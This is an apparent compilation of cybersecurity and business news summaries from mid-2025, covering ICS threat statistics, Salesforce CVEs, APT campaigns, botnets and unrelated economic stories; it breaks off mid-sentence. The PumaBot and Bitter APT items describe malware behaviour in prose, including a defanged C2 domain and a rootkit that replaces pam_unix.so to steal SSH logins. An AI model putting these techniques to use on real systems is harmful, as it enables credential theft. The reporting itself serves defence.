News

US airline industry quietly selling flight data to DHS

industry
2025-06-11 https://www.malwarebytes.com/blog/news/2025/06/us-airline-industry-quietly-selling-flight-data-to-dhs
Flight data of US customers is being sold by several airlines through a joint data broker sending contracts to ICE and CBP.

Autosummary: Delta, Southwest, United, Lufthansa, Air France, American Airlines, Air Canada, Alaska Airlines, and JetBlue all have seats on the ARC board.


Threat landscape for industrial automation systems. Regions, Q1 2025

industry
2025-06-10 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-regions-q1-2025/
The internet ranks first among threat sources in all regions. The problem is particularly relevant to Africa, South-East Asia, South Asia and Russia.

Autosummary: The region had significantly higher, compared to the global average, percentages of ICS computers on which the following categories of malicious objects were blocked: Worms — 2.8 times higher; Viruses — 2.5 times higher; Spyware — 1.7 times higher; Ransomware — 1.6 times higher; Web miners — 1.5 times higher; Malicious programs targeting AutoCAD — 1.5 times higher; Malicious scripts and phishing pages — 1.4 times higher; Malicious documents — 1.3 times higher.

The greatest differences in regional percentages compared to the global averages were observed for the following threat categories: Ransomware — 1.9 times higher, second place among all regions; Worms — 1.5 times higher, third place among all regions; Spyware — 1.5 times higher, third place among all regions; Malicious documents — 1.5 times higher, third place among all regions; Malicious scripts and phishing pages — 1.3 times higher, third place among all regions; Viruses — 1.3 times higher.

Comparative analysis, threat categories: Compared to global averages, the region has a noticeably higher percentage of ICS computers on which the following threat categories were blocked: Web miners — by a factor of 1.4; Malicious documents — by a factor of 1.3; Spyware — by a factor of 1.2; Worms — by a factor of 1.2; Malicious scripts and phishing pages — by a factor of 1.1; Miners in the form of executable files for Windows — by a factor of 1.1.

Comparative analysis, threat categories: Compared to global averages, Southern Europe shows higher percentages of ICS computers on which the following threat categories were blocked: Malicious documents — by a factor of 2.2; Spyware — by a factor of 1.6; Ransomware — by a factor of 1.5; Malicious scripts and phishing pages — by a factor of 1.4.

Figure: Percentage of ICS computers on which the activity of malicious objects from various categories was blocked. Figure: Changes in the percentage of ICS computers on which malicious documents were blocked, Q1 2025.

Malicious scripts and phishing pages: Attackers use malicious scripts to perform a broad range of tasks — from collecting data, tracking, and redirecting the user’s browser to a malicious web resource, to downloading various types of malware (such as spyware, programs for covert cryptocurrency mining, or ransomware) onto the system or into the user’s browser.

This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers; Building automation servers; Data storage (Historian) servers; Data gateways (OPC); Stationary workstations of engineers and operators; Mobile workstations of engineers and operators; Human machine interface (HMI); Computers used to manage technological and building automation networks; Computers of ICS/PLC programmers. Computers that share statistics with us belong to organizations from various industries.

Comparative analysis, threat categories: Compared to global averages, the region showed noticeably higher percentages of ICS computers on which the following threat categories were blocked: Web miners — by a factor of 1.3; Viruses — by a factor of 1.2; Malicious scripts and phishing pages — by a factor of 1.1; Worms — by a factor of 1.1.

Threat sources: For all threat sources, the percentage of ICS computers in the region on which malicious objects were blocked exceeds the global average: Threats in network folders — by a factor of 2.3; Threats from email clients — by a factor of 1.4; Threats from removable media — by a factor of 1.4; Internet threats — by a factor of 1.2.

Compared to global averages, the region has significantly higher percentages of ICS computers affected by the following categories of malicious objects: AutoCAD malware — by a factor of 3.5; Ransomware — by a factor of 2; Viruses — by a factor of 1.9; Worms — by a factor of 1.1; Spyware — by a factor of 1.1.

Figure: Changes in the percentage of ICS computers on which web miners were blocked, Q1 2025.

Miners in the form of executable files for Windows: The top three regions by percentage of ICS computers on which miners in the form of executable files for Windows were blocked: Central Asia — 1.72%; Russia — 1.04%; Eastern Europe — 0.85%.

In regional rankings in Q1 2025, Central Asia demonstrated the following results: first place by percentage of ICS computers on which miners in the form of executable files for Windows were blocked; second place by percentage of ICS computers on which worms were blocked; third place by percentage of ICS computers on which denylisted internet resources were blocked.

In Q1 2025, East Asia ranked among all regions: first by percentage of ICS computers on which ransomware was blocked; second by percentage of ICS computers on which AutoCAD malware was blocked; third by percentage of ICS computers on which viruses were blocked.

Comparative analysis, threat categories: Compared to global averages, Latin America shows higher percentages of ICS computers on which the following threat categories were blocked: Malicious documents — by a factor of 1.8; Malicious scripts and phishing pages — by a factor of 1.3; Web miners — by a factor of 1.3.

Compared to global figures, the region has significantly higher percentages of ICS computers on which the following categories of malicious objects were blocked: Malicious programs for AutoCAD — 7.8 times higher; Viruses — 5.7 times higher; Web miners — 1.5 times higher; Spyware — 1.4 times higher.

Regions ranked by percentage of ICS computers on which malicious objects were blocked, Q1 2025: All regions ranked by percentage of ICS computers on which malicious objects were blocked in the first quarter can be divided into three groups. Over 25%: Africa — 29.6%; South-East Asia — 29.1%. In the regions within this group, OT computers are generally overexposed to cyberthreats. 20–25%: Central Asia — 24.2%; Middle East — 24.1%; Eastern Europe — 21.8%; South Asia — 21.0%; East Asia — 21.0%; Latin America — 21.0%; Southern Europe — 20.8%. The regions within this group may face specific challenges in isolating their OT infrastructure from potential cyberthreats.

In Q1 2025, the percentage of ICS computers on which malicious objects were blocked increased in the following sectors and OT infrastructures: Biometrics — by a factor of 1.1; Construction — by a factor of 1.1; Manufacturing — by a factor of 1.1; Building automation.

The region’s percentage figures exceeded global averages for all threat sources: Removable media threats — by a factor of 4.7; Email threats — by a factor of 1.4; Internet threats — by a factor of 1.3; Threats in network folders — by a factor of 1.1.

Quarterly changes and trends, threat categories: In Q1 2025, Southern Europe ranks first among all regions by growth in the percentage of ICS computers on which the following threat categories were blocked: Spyware; Worms; Malware for AutoCAD.

Figure: Kill chain example: the use of legitimate mining tools in cryptomining attacks.

Ransomware: Top three regions by percentage of ICS computers on which ransomware was blocked: East Asia — 0.32%; Middle East — 0.30%; Africa — 0.25%.

The denylist is used to block primarily the following threats on ICS computers: Known malicious URLs and IP addresses used by attackers to host payloads and configurations; Suspicious (untrusted) web resources offering entertainment or gaming content, often abused to deliver unwanted software, cryptocurrency miners, or malicious scripts; CDN nodes leveraged by threat actors to deliver malicious scripts via legitimate websites; File-sharing and data exchange services, including public repositories, that are often used to host next-stage payloads and configurations.

Threat sources: In Q1 2025, Central Asia exceeded global averages in the percentage of ICS computers on which the following malicious objects were blocked: Threats from removable media — by a factor of 1.5; Threats in network folders — by a factor of 1.1.

Figure: Regions ranked by percentage of ICS computers on which threats were blocked when connecting removable media, Q1 2025.

Frequent attempts to infect protected systems when connecting USB drives may indicate: low connectivity in the organization’s OT network (a large number of remote sites not linked to the main network by high-speed and reliable communication lines); low level of enterprise IT infrastructure development (the absence of other standard internal systems for file storage and transfer); the presence of a significant unprotected part of the infrastructure that acts as a source of initial infection for removable drives; poor cybersecurity culture overall.

Viruses: Top three regions by percentage of ICS computers on which viruses were blocked: South-East Asia, a clear leader — 8.68%; Africa — 3.87%; East Asia — 2.85%.

Figure: Regions ranked by percentage of ICS computers on which malicious scripts and phishing pages were blocked, Q1 2025.

Threat actors use malicious scripts for a wide range of purposes — from collecting data, tracking, and redirecting a user’s browser to a malicious web resource, to delivering a variety of malware (including spyware, malware for covert cryptocurrency mining or ransomware) to the user’s system or browser.

AutoCAD malware: The top three regions ranked by percentage of ICS computers on which malicious AutoCAD programs were blocked are the same regions that top the virus ranking: South-East Asia — 2.65%; East Asia — 1.19%; Africa — 0.51%.

In Q1 2025, Africa ranked first among all regions by the percentage of ICS computers on which the following categories of malicious objects were blocked: Denylisted internet resources; Spyware; Worms; Web miners.

Comparative analysis, threat categories: Compared to global averages, Russia has higher percentages of ICS computers on which the following threats were blocked: Denylisted internet resources — by a factor of 1.1; Miners in the form of executable files for Windows.

Web miners running in browsers: The top three regions by percentage of ICS computers on which web miners running in browsers were blocked were: Africa — 0.81%; South-East Asia — 0.80%; Eastern Europe — 0.76%.

Threat sources: In the Middle East, the percentages of ICS computers on which the following threats were blocked significantly exceed global averages: Email threats — 1.8 times higher; Threats on removable media — 1.7 times higher.

Threat sources: In Q1 2025, the percentage of ICS computers on which malicious objects were blocked increased for two threat sources: Internet threats — by a factor of 1.1; Email threats — by a factor of 1.1.

Compared to the corresponding global averages, the following industries in East Asia showed higher percentages of ICS computers on which malicious objects were blocked: Electric power sector — by a factor of 1.3; Construction — by a factor of 1.1; Manufacturing — by a factor of 1.1.

In Q1 2025, the top three regions by percentage of ICS computers on which spyware was blocked included: Africa — 7.05%; Southern Europe — 6.52%; Middle East — 6.25%.

Other indicators that increased were the percentages of ICS computers on which the following threats were blocked: Worms — by a factor of 1.2; Miners in the form of executable files for Windows — by a factor of 1.2; Malicious documents — by a factor of 1.1.

Figure: Changes in the percentage of attacked ICS computers in Q1 2025.

Threat sources: The internet (access to malicious or compromised web resources; malicious content distributed via messengers, cloud data storage and processing services, and CDNs), email clients (phishing emails), and removable media remain the primary sources of threats to computers in the OT infrastructure of organizations.

Top three regions by percentage of ICS computers affected by threats in network folders in Q1 2025: East Asia, the undisputed leader — 0.27%; South-East Asia — 0.16%; South Asia — 0.11%.

The percentage of ICS computers on which malicious objects were blocked exceeds global averages most significantly in the following industries: Electric power sector — by a factor of 1.2; Construction — by a factor of 1.1; Building automation — by a factor of 1.1.

Quarterly changes and trends, threat categories: The highest increases over the previous quarter were observed in Q1 2025 in the percentage of ICS computers on which the following categories of malicious objects were blocked: Ransomware — by a factor of 1.4, with East Asia ranking first among regions based on growth in this category.

Figure: Regions ranked by percentage of ICS computers on which viruses were blocked, Q1 2025.

Apparently, high percentage figures for self-propagating malware and threats in network folders indicate that a significant part of the infrastructure is unprotected, becoming a source of secondary malware infections (malware propagation), and point to a lack of segmentation in enterprise networks in the region.

Quarterly changes and trends, threat categories: The largest increases from the previous quarter in Australia and New Zealand were recorded for percentages of ICS computers on which the following categories of threats were blocked: Malicious scripts and phishing pages — by a factor of 1.1, second place among regions by growth in this category.

Africa, current threats: Africa has for many years topped the ranking of regions by percentage of ICS computers on which malicious objects were blocked, with figures significantly exceeding the global averages; in Q1 2025, the percentage was 1.4 times higher than the global figure.


Researchers Uncover 20+ Configuration Risks, Including Five CVEs, in Salesforce Industry Cloud

industry
2025-06-10 https://thehackernews.com/2025/06/researchers-uncover-20-configuration.html
Cybersecurity researchers have uncovered over 20 configuration-related risks affecting Salesforce Industry Cloud (aka Salesforce Industries), exposing sensitive data to unauthorized internal and external parties. The weaknesses affect various components like FlexCards, Data Mappers, Integration Procedures (IProcs), Data Packs, OmniOut, and OmniScript Saved Sessions. "Low-code platforms such as

Autosummary: FlexCard does not enforce the "View Encrypted Data" permission, returning plaintext values for data that uses Classic Encryption CVE-2025-43701 (CVSS score: 7.5) - If "Check Field Level Security" is not enabled for "Extract" and "Turbo Extract" Data Mappers, the "View Encrypted Data" permission check is not enforced, exposing cleartext values for the encrypted fields to users with access to a given record CVE-2025-43698 (CVSS score: N/A) -


CISOs, are you ready for cyber threats in biotech?

industry
2025-06-09 https://www.helpnetsecurity.com/2025/06/09/cyberbiosecurity-ciso-cyber-threats/

The threat landscape in the bioeconomy is different from what most CISOs are used to. It includes traditional risks like data breaches, but the consequences are more complex. A compromise of genomic databases, for example, does not just expose personal health data. It can also leak proprietary genetic sequences that represent years of research and investment. These are not just privacy violations; they are breaches that can cripple a business’s future R&D pipeline. One example …

The post CISOs, are you ready for cyber threats in biotech? appeared first on Help Net Security.

Autosummary: The threats are real, and the stakes are operational, reputational, and in some cases, biological. Strategies for CISOs: To reduce risk in the bioeconomy, CISOs need to start thinking about cybersecurity and biosecurity as a single, combined effort, not separate problems.


BadBox 2.0 botnet infects millions of IoT devices worldwide, FBI warns

industry
2025-06-09 https://securityaffairs.com/178789/malware/badbox-2-0-botnet-infects-millions-of-iot-devices-worldwide-fbi-warns.html
BadBox 2.0 malware has infected millions of IoT devices globally, creating a botnet used for cyber criminal activities, the FBI warns. The FBI published a Public Service Announcement (PSA) to warn that cybercriminals are using the BADBOX 2.0 botnet to exploit IoT devices on home networks, like streaming devices, projectors, and infotainment systems, mostly made […]


Researchers Detail Bitter APT’s Evolving Tactics as Its Geographic Scope Expands

industry
2025-06-05 https://thehackernews.com/2025/06/bitter-hacker-group-expands-cyber.html
The threat actor known as Bitter has been assessed to be a state-backed hacking group that’s tasked with gathering intelligence that aligns with the interests of the Indian government. That’s according to new findings jointly published by Proofpoint and Threatray in an exhaustive two-part analysis. "Their diverse toolset shows consistent coding patterns across malware families, particularly in

Autosummary: Bitter’s malware families. Some of the other known tools in its arsenal are below:
ArtraDownloader, a downloader written in C++ that collects system information and uses HTTP requests to download and execute a remote file
Keylogger, a C++ module used in various campaigns to record keystrokes and clipboard content
WSCSPL Backdoor, a backdoor that’s delivered via ArtraDownloader and supports commands to get machine information, execute remote instructions, and download and run files
MuuyDownloader (aka ZxxZ), a trojan that allows remote code execution of payloads received from a remote server
Almond RAT, a .NET trojan that offers basic data gathering functionality and the ability to execute arbitrary commands and transfer files
ORPCBackdoor, a backdoor that uses the RPC protocol to communicate with a command-and-control (C2) server and runs operator-issued instructions
KiwiStealer, a stealer that searches for files that match a predefined set of extensions, are smaller than 50 MB, and have been modified within the past year, and exfiltrates them to a remote server
KugelBlitz, a shellcode loader that’s used to deploy the Havoc C2 framework
It’s worth noting that ORPCBackdoor has been attributed by the Knownsec 404 Team to a threat actor called Mysterious Elephant, which it said overlaps with other India-aligned threat clusters, including SideWinder, Patchwork, Confucius, and Bitter.


Turning used cooking oil into soap in a country where deep-fried foods rule

government industry
2025-06-01 https://www.bbc.com/news/articles/c9djx7llj44o
A group of young environmentalists in Honduras are turning used cooking oil into soap and dog food.

Autosummary: (Fritz Pinnow, reporter, Comayagua, Honduras.) Hugo Daniel Chávez is proud of the soap his team makes from recycled cooking oil. Few 27-year-olds look at used cooking oil and see a green business opportunity to produce soap or dog food. "Next to our plant that produces the soap and dog food, someone else has a water purification plant and we use the water that plant cannot purify, its waste so to say, for our water cooling system," he explains.


Football and other premium TV being pirated at "industrial scale"

industry
2025-05-30 https://www.bbc.com/news/articles/cp3n7dx2174o
New research singles out the Amazon Fire Stick as the most popular means of accessing illegal streams.

Autosummary: (Image caption, Getty Images: Liverpool won the English Premier League this season, and live football is the focus on many illegal streams.) A lack of action by big tech firms is enabling the "industrial scale theft" of premium video services, especially live sport, a new report says.


US green energy firms brace for federal funding cuts

industry
2025-05-29 https://www.bbc.com/news/articles/clynkqw236po
Billions of dollars of US federal funding for green energy projects hangs in the balance.

Autosummary: Meanwhile, the fate of the IRA, which the Congress has the power to amend or repeal along with the IIJA, is being decided, in part, by the budget bill, which aims to permanently extend President Trump’s first term tax cuts by making savings elsewhere. Meanwhile, actual clean energy investment in the US, including from both government and private sources (the far larger share), dropped 3.8% in the first quarter of 2025 to $67.3bn, a second quarterly decline, according to new figures released by the Clean Investment Monitor.


251 Amazon-Hosted IPs Used in Exploit Scan Targeting ColdFusion, Struts, and Elasticsearch

exploits industry
2025-05-28 https://thehackernews.com/2025/05/251-amazon-hosted-ips-used-in-exploit.html
Cybersecurity researchers have disclosed details of a coordinated cloud-based scanning activity that targeted 75 distinct "exposure points" earlier this month. The activity, observed by GreyNoise on May 8, 2025, involved as many as 251 malicious IP addresses that are all geolocated to Japan and hosted by Amazon. "These IPs triggered 75 distinct behaviors, including CVE exploits,


New PumaBot Botnet Targets Linux IoT Devices to Steal SSH Credentials and Mine Crypto

industry Linux
2025-05-28 https://thehackernews.com/2025/05/new-pumabot-botnet-targets-linux-iot.html
Embedded Linux-based Internet of Things (IoT) devices have become the target of a new botnet dubbed PumaBot. Written in Go, the botnet is designed to conduct brute-force attacks against SSH instances to expand in size and scale and deliver additional malware to the infected hosts. "Rather than scanning the internet, the malware retrieves a list of targets from a command-and-control (C2) server

Autosummary: Darktrace said its analysis of the campaign uncovered other related binaries that are said to be deployed as part of a broader campaign:
ddaemon, a Go-based backdoor that retrieves the binary "networkxm" into "/usr/src/bao/networkxm" and executes the shell script "installx.sh"
networkxm, an SSH brute-force tool that functions similarly to the botnet’s initial stage by fetching a password list from a C2 server and attempting to connect via SSH across a list of target IP addresses
installx.sh, which is used to retrieve another shell script "jc.sh" from "1.lusyn[.]xyz," grant it read, write, and execute permissions for all access levels, run the script, and clear bash history
jc.sh, which is configured to download a malicious "pam_unix.so" file from an external server and use it to replace the legitimate counterpart installed on the machine, as well as retrieve and run another binary named "1" from the same server
pam_unix.so, which acts as a rootkit that steals credentials by intercepting successful logins and writing them to the file "/usr/bin/con.txt"
1, which is used to monitor for the file "con.txt" being written or moved to "/usr/bin/" and then exfiltrate its contents to the same server
Given that the SSH brute-force capabilities of the botnet malware lend it worm-like capabilities, users are advised to keep an eye out for anomalous SSH login activity, particularly failed login attempts, audit systemd services regularly, review authorized_keys files for the presence of unknown SSH keys, apply strict firewall rules to limit exposure, and filter HTTP requests with non-standard headers, such as X-API-KEY: jieruidashabi.


New PumaBot targets Linux IoT surveillance devices

industry Linux
2025-05-28 https://securityaffairs.com/178386/malware/pumabot-targets-linux-iot-devices.html
PumaBot targets Linux IoT devices, using SSH brute-force attacks to steal credentials, spread malware, and mine crypto. Darktrace researchers discovered a new botnet called PumaBot targets Linux-based IoT devices, using SSH brute-force attacks to steal credentials, spread malware, and mine cryptocurrency. PumaBot skips broad internet scans and instead pulls a list of targets from its […]

Autosummary: (Pierluigi Paganini, May 28, 2025.) “While it does not appear to propagate automatically like a traditional worm, it does maintain worm-like behavior by brute-forcing targets, suggesting a semi-automated botnet campaign focused on device compromise and long-term access.”


How AI agents reshape industrial automation and risk management

industry
2025-05-27 https://www.helpnetsecurity.com/2025/05/27/michael-metzler-siemens-ai-agents-industrial-environments/

In this Help Net Security interview, Michael Metzler, Vice President Horizontal Management Cybersecurity for Digital Industries at Siemens, discusses the cybersecurity implications of deploying AI agents in industrial environments. He talks about the risks that come with AI agents making semi-autonomous decisions, and why a layered security approach like Defense-in-Depth is key to keeping industrial systems safe. What are the implications of an AI agent being compromised in a critical infrastructure environment, such as an …

The post How AI agents reshape industrial automation and risk management appeared first on Help Net Security.

Autosummary: The Defense-in-Depth concept considers all essential security factors, including physical access protection for manufacturing sites, organizational and technical measures to protect production networks and control systems from unauthorized access, espionage, and manipulation. Well-implemented security measures such as continuous verification, appropriate access controls, and behavioral analytics enable organizations to effectively utilize AI capabilities while maintaining operational safety and security.


Russia-linked APT28 targets western logistics entities and technology firms

industry
2025-05-22 https://securityaffairs.com/178165/apt/russia-linked-apt28-targets-western-logistics-entities-and-technology-firms.html
CISA warns Russia-linked group APT28 is targeting Western logistics and tech firms aiding Ukraine, posing an elevated threat to supply chains. Russia-linked cyberespionage group APT28 intensifies its operations against Western logistics and technology companies moving supplies into Ukraine, US CISA warns. The APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007 and it […]

Autosummary: APT28 used various methods for initial access, including brute-force attacks, spear-phishing, and exploiting known vulnerabilities in Outlook, Roundcube, WinRAR, VPNs, and SOHO devices. The APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide.


U.S. CISA adds Ivanti EPMM, MDaemon Email Server, Srimax Output Messenger, Zimbra Collaboration, and ZKTeco BioTime flaws to its Known Exploited Vulnerabilities catalog

exploits industry
2025-05-21 https://securityaffairs.com/178140/security/u-s-cisa-adds-ivanti-epmm-mdaemon-email-server-srimax-output-messenger-zimbra-collaboration-and-zkteco-biotime-flaws-to-its-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti EPMM, MDaemon Email Server, Srimax Output Messenger, Zimbra Collaboration, and ZKTeco BioTime flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Google Chromium, DrayTek routers, and SAP NetWeaver flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions […]

Autosummary: (Pierluigi Paganini, May 21, 2025.)


Russian Hackers Exploit Email and VPN Vulnerabilities to Spy on Ukraine Aid Logistics

exploits industry rusia-ucrania
2025-05-21 https://thehackernews.com/2025/05/russian-hackers-exploit-email-and-vpn.html
Russian cyber threat actors have been attributed to a state-sponsored campaign targeting Western logistics entities and technology companies since 2022. The activity has been assessed to be orchestrated by APT28 (aka BlueDelta, Fancy Bear, or Forest Blizzard), which is linked to the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center, Military Unit 26165.

Autosummary: Targets of the campaign include companies involved in the coordination, transport, and delivery of foreign assistance to Ukraine, according to a joint advisory released by agencies from Australia, Canada, Czechia, Denmark, Estonia, France, Germany, the Netherlands, Poland, the United Kingdom, and the United States.


The secretive US factory that lays bare the contradiction in Trump’s America First plan

industry
2025-05-18 https://www.bbc.com/news/articles/cwywj0zgzwxo
An exclusive look inside the closely guarded factory the president wants to become a foundation stone for a US golden age.

Autosummary: (Faisal Islam, Economics editor, reporting from Arizona.) Among the cactuses in the desert of Arizona, just outside Phoenix, an extraordinary collection of buildings is emerging that will shape the future of the global economy and the world. It is, in my view, the most important factory in the world, and it’s being built by a company you may not have heard of: TSMC, Taiwan Semiconductor Manufacturing Company. The supply chain for semiconductors is global as no single country can do everything at the moment, says Rose Castanares, President of TSMC Arizona. On the walkway into the building are photographs showing Biden’s visit in 2022, with the building site draped in the Stars and Stripes and a banner saying "a future Made in America". The expansion of the Arizona facility, which was announced in March is, he believes, the poster child for his economic policies - in particular the encouragement of foreign companies to relocate factories to the US to avoid hefty tariffs. So for now, it’s a battle for global tech and economic supremacy, in which Taiwan’s factory technology, some of which is now being moved to the Arizona desert, is the critical asset.


Apple boosts India's factory hopes - but a US-China deal could derail plans

industry
2025-05-18 https://www.bbc.com/news/articles/cly34p1jwvgo
The US-China trade "reset" could stall the manufacturing investment coming into India, say experts. "

Autosummary: Nomura, a Japanese broking house, also pointed to growing "anecdotal evidence" of India emerging as a winner from "trade diversion and supply-chain shift in low and mid-tech manufacturing" particularly in sectors like electronics, textiles and toys. "


Threat landscape for industrial automation systems. Q1 2025

industry
2025-05-15 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-q1-2025/
The percentage of ICS computers on which various types of malware spread via the internet and email were blocked increased for the first time in two years. "

Autosummary:
  Category                                             Q4 2024   Q1 2025   Change
  (category name truncated in extract)                  7.11%     7.16%    ▲0.05 pp
  Denylisted internet resources                         5.52%     5.12%    ▼0.40 pp
  Spy Trojans, backdoors and keyloggers                 4.30%     4.20%    ▼0.10 pp
  Malicious documents (MSOffice + PDF)                  1.71%     1.85%    ▲0.14 pp
  Viruses                                               1.61%     1.53%    ▼0.08 pp
  Worms                                                 1.37%     1.31%    ▼0.06 pp
  Miners in the form of executable files for Windows    0.70%     0.78%    ▲0.08 pp
  Web miners running in browsers                        0.39%     0.53%    ▲0.14 pp
  Malware for AutoCAD                                   0.38%     0.34%    ▼0.04 pp
  Ransomware                                            0.21%     0.16%    ▼0.05 pp
  Main threat sources
  Internet                                              9.98%    10.11%    ▲0.13 pp
  Email clients                                         2.72%     2.81%    ▲0.09 pp
  Removable media                                       0.64%     0.52%    ▼0.12 pp
  Network folders                                       0.08%     0.07%    ▼0.01 pp

Trends: relative stability from quarter to quarter.

Figures: Percentage of ICS computers on which threats from network folders were blocked, Q1 2022–Q1 2025 and Q1 2023–Q1 2025. The top three regions by percentage of ICS computers on which threats from network folders were blocked were East Asia, South-East Asia, and South Asia.

This group includes Windows computers that serve one or several of the following purposes:
  • Supervisory control and data acquisition (SCADA) servers
  • Building automation servers
  • Data storage (Historian) servers
  • Data gateways (OPC)
  • Stationary workstations of engineers and operators
  • Mobile workstations of engineers and operators
  • Human machine interface (HMI)
  • Computers used to manage technological and building automation networks
  • Computers of ICS/PLC programmers
Computers that share statistics with us belong to organizations from various industries.

Figures: Percentage of ICS computers on which the activity of malicious objects from various categories was blocked; Changes in percentage of ICS computers on which malicious objects from different categories were blocked, Q1 2025. The largest proportional increase in Q1 2025 was in the percentage of ICS computers on which web miners (1.4 times more than in the previous quarter) and malicious documents (1.1 times more) were blocked.

Figure: Changes in percentage of ICS computers on which malicious scripts and phishing pages were blocked, Q1 2025.

Next-stage malware: Malicious objects used to initially infect computers deliver next-stage malware – spyware, ransomware, and miners – to victims’ computers.

Figure: Percentage of ICS computers on which malicious scripts and phishing pages were blocked, Jan 2023–Mar 2025. The top three regions by percentage of ICS computers on which malicious scripts and phishing pages were blocked were Southern Europe, Africa, and the Middle East.

Figure: Changes in percentage of ICS computers on which miners in the form of executable files for Windows were blocked, Q1 2025.

Web miners: In Q1 2025, the percentage of ICS computers on which web miners were blocked increased, reaching its highest level since Q3 2023.

Figure: Percentage of ICS computers on which miners in the form of executable files for Windows were blocked, Jan 2023–Mar 2025. Central Asia, Russia, and Eastern Europe were the top three regions by percentage of ICS computers on which miners in the form of executable files for Windows were blocked.

Figure: Percentage of ICS computers on which threats from removable media were blocked, Q1 2022–Q1 2025. The main categories of threats that are blocked when removable media is connected to ICS computers are worms, viruses, and spyware.

Figure: Percentage of ICS computers on which threats from the internet were blocked, Q1 2022–Q1 2025. The main categories of threats from the internet blocked on ICS computers are denylisted internet resources, malicious scripts and phishing pages, and web miners.

Figure: Percentage of ICS computers on which threats from email clients were blocked, Q1 2022–Q1 2025. The main categories of threats from email clients blocked on ICS computers are malicious documents, spyware, and malicious scripts and phishing pages.

Figure: Regions ranked by percentage of ICS computers on which threats from email clients were blocked, Q1 2025.

Removable media: In Q1 2025, the percentage of ICS computers on which threats from removable media were blocked continued to decrease and reached its lowest level since the beginning of 2023.

Figure: Regions ranked by percentage of ICS computers on which threats from removable media were blocked, Q1 2025.

Network folders: In Q1 2025, the percentage of ICS computers on which threats from network folders were blocked reached its lowest level since early 2022. "


Southwest Airlines CISO on tackling cyber risks in the aviation industry

industry
2025-05-14 https://www.helpnetsecurity.com/2025/05/14/carrie-mills-southwest-airlines-aviation-industry-cybersecurity-challenges/

In this Help Net Security interview, Carrie Mills, VP and CISO, Southwest Airlines talks about the cybersecurity challenges facing the aviation industry. She explains how being part of critical infrastructure, a major consumer brand, and an airline each brings its own set of security issues. What are the most pressing cyber threats currently facing the aviation industry? Southwest is not only an airline but also a well-known consumer brand and part of a United States … More

The post Southwest Airlines CISO on tackling cyber risks in the aviation industry appeared first on Help Net Security.

"

Autosummary: While not aviation-specific, Southwest leverages the National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF), which provides a risk-based approach integral to mitigating cybersecurity risks and impacts on our facilities, airports, and aircraft. How effective are current regulations and cybersecurity standards (e.g., ICAO, EASA, FAA, IATA) in mitigating cyber risks in aviation? "


Letting off steam: How Dominica's volcanoes will boost its green energy

industry
2025-05-14 https://www.bbc.com/news/articles/c4gezw5n579o
The Caribbean island is building a power station that will use steam naturally heated by volcanic rock. "

Autosummary: Gemma Handy, Business reporter, reporting from St John’s, Antigua. The new geothermal power plant will access steam from boiling hot, natural underground reservoirs. With rainforests, waterfalls, volcanoes and hot springs, the Caribbean island of Dominica's dramatic landscape is a haven for adventure-seeking ecotourists. "Ormat is doing the entire project, from making the plant's elements, shipping them to Dominica, mainly from Israel, and then constructing the power plant." "


How Interlock Ransomware Affects the Defense Industrial Base Supply Chain

exploits ransomware industry
2025-05-13 https://securityaffairs.com/177792/malware/how-interlock-ransomware-affects-the-defense-industrial-base-supply-chain.html
Interlock Ransomware's attack on a defense contractor exposed global defense supply chain details, risking operations of top contractors and their clients. Resecurity envisions the cascading effects on the defense supply chain due to ransomware activity. In the recent incident, by attacking a defense contractor, Interlock Ransomware uncovered details about the supply chains and operations […] "

Autosummary: "


⚡ Weekly Recap: Zero-Day Exploits, Developer Malware, IoT Botnets, and AI-Powered Scams

financial exploits industry
2025-05-12 https://thehackernews.com/2025/05/weekly-recap-zero-day-exploits.html
What do a source code editor, a smart billboard, and a web server have in common? They’ve all become launchpads for attacks—because cybercriminals are rethinking what counts as “infrastructure.” Instead of chasing high-value targets directly, threat actors are now quietly taking over the overlooked: outdated software, unpatched IoT devices, and open-source packages. It's not just clever—it’s "

Autosummary: This week's list includes — CVE-2025-32819, CVE-2025-32820, CVE-2025-32821 (SonicWall), CVE-2025-20188 (Cisco IOS XE Wireless Controller), CVE-2025-27007 (OttoKit), CVE-2025-24977 (OpenCTI), CVE-2025-4372 (Google Chrome), CVE-2025-25014 (Elastic Kibana), CVE-2025-4318 (AWS Amplify Studio), CVE-2024-56523, CVE-2024-56524 (Radware Cloud Web Application Firewall), CVE-2025-27533 (Apache ActiveMQ), CVE-2025-26168, CVE-2025-26169 (IXON VPN), CVE-2025-23123 (Ubiquiti UniFi Protect Cameras), CVE-2024-8176 (libexpat), and CVE-2025-47188 (Mitel 6800 Series, 6900 Series, and 6900w Series SIP Phones). With support for cloud services (S3, GCS, Firebase), databases (MySQL, PostgreSQL, MongoDB, Redis), messaging apps (Slack), and local file systems, it uses advanced OCR and pattern-matching to uncover sensitive data hidden in documents, images, archives, and even videos. "Despite vendor customizations in USB stacks, ChoiceJacking attacks gain access to sensitive user files (pictures, documents, app data) on all tested devices from 8 vendors including the top 6 by market share," researchers Florian Draschbacher, Lukas Maar, Mathias Oberhuber, and Stefan Mangard said. The attacks, detected in January, March, and April 2025, targeted current and former advisors to Western governments and militaries, as well as journalists, think tanks, and NGOs, as well as individuals connected to Ukraine. "Although these activities often include basic and elementary intrusion techniques, the presence of poor cyber hygiene and exposed assets can escalate these threats, leading to significant consequences such as defacement, configuration changes, operational disruptions and, in severe cases, physical damage," the agencies said. Built for speed and simplicity, it allows investigators to quickly search through Windows Event Logs, MFT files, Shimcache, SRUM, and registry hives using keyword matching, regex, and Sigma detection rules. "By targeting browsers, authentication tokens, and system files, it enables cybercriminals to perform identity theft, corporate espionage, and unauthorized financial transactions," Flashpoint said. The flaws, tracked as CVE-2025-2775, CVE-2025-2776, CVE-2025-2777 (CVSS scores: 9.3), and CVE-2025-2778, have been addressed in 